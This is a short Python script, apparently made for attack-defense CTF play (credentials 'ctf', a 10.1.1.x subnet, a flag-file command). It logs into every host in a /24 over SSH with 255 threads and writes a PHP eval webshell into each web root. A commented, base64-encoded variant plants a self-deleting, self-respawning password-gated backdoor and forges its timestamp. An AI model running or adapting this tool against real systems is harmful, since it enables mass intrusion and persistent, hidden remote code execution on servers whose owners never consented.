SSH密码登录（一次性多IP登录）

 1 #-*- coding:utf-8 -*-
 2 import paramiko
 3 import threading
 4 import queue
 5 
 6 #反弹shell python
 7 q=queue.Queue()
 8 #lock = threading.Lock()
 9 
10 #private_key_path = '/home/auto/.ssh/id_rsa'  # 如果要用密钥登录
11 #private_key_path = "D:\\id_rsa.txt"
12 #key = paramiko.RSAKey.from_private_key_file(private_key_path)
13 
14 # ssh 用户名 密码 登陆
15 def ssh_base_pwd(ip,port,username,passwd,cmd):
16     port = int(port)
17     ssh = paramiko.SSHClient()
18     ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
19     ssh.connect(hostname=ip, port=port, username=username, password=passwd)
20     #ssh.connect(hostname=ip, port=port, username=username, key_filename=key)
21     stdin,stdout,stderr = ssh.exec_command(cmd)
22     result = stdout.read()
23     if not result :
24         result = stderr.read()
25     ssh.close()
26     return result.decode()
27 
28 def main(x):
29     cmd = 'cd ../../var/www/html ; echo "<?php @eval(\$_POST[password]); ?>" > .config.php ; '   #批量在文件目录下写入webshell
30     #下面这条语句是写不死马，位置放在/var/www/html/.content.php
31     # cmd = 'echo "PD9waHAKCSAgICBpZ25vcmVfdXNlcl9hYm9ydCh0cnVlKTsKCSAgICBzZXRfdGltZV9saW1pdCgwKTsKCSAgICB1bmxpbmsoX19GSUxFX18pOwoJICAgICRmaWxlID0gJy5jb25maWcucGhwJzsKCSAgICAkY29kZSA9ICc8P3BocCBpZihtZDUoJF9HRVRbInBhc3MiXSk9PSIxYTFkYzkxYzkwNzMyNWM2OTI3MWRkZjBjOTQ0YmM3MiIpe0BldmFsKCRfUE9TVFthXSk7fSA/Pic7CgkgICAgLy9wYXNzPXBhc3MKCSAgICB3aGlsZSAoMSl7CgkgICAgICAgIGZpbGVfcHV0X2NvbnRlbnRzKCRmaWxlLCRjb2RlKTsKCSAgICAgICAgc3lzdGVtKCd0b3VjaCAtbSAtZCAiMjAyMi0xMC0wMSAwOToxMDoxMiIgLmNvbmZpZy5waHAnKTsKCSAgICAgICAgdXNsZWVwKDUwMDApOwoJICAgIH0KPz4K" | base64 -d > /var/www/html/.content.php'
32     # cmd = 'cat /www/admin/flag.txt'           #读取txt文件
33 
34     port = '22'
35     username = 'ctf'
36     passwd = 'ctf'
37 
38     ip = '10.1.1.{}'.format(x)
39     q.put(ip.strip(),block=True, timeout=None)
40     ip_demo=q.get()
41     #判断是否成功
42     try:
43         #lock.acquire()
44         res = ssh_base_pwd(ip_demo,port,username,passwd,cmd)
45         if res:
46             print("[ + ]Ip: %s" % ip_demo +" is success!!! [ + ]")
47             #lock.release()
48             #result = ssh_base_pwd(ip_demo,port,username,passwd,cmd)
49             print(res)
50             # 打印内容在E盘下
51             with open("E:\\result.txt","a",encoding='utf-8') as f:
52                 f.write('%s,%s'%(ip_demo,res)+"\n")
53     except:
54         print("[ - ]Ip: %s" % ip_demo +" is Failed")
55     if x > 255:
56         print("Finshed!!!!!!!!")
57     q.task_done()
58 
59 #线程队列部分
60 th=[]
61 th_num=255
62 for x in range(th_num):
63         t=threading.Thread(target=main,args=(x,))
64         th.append(t)
65 for x in range(th_num):
66         th[x].start()
67 for x in range(th_num):
68         th[x].join()
69 
70 #q.join()所有任务完成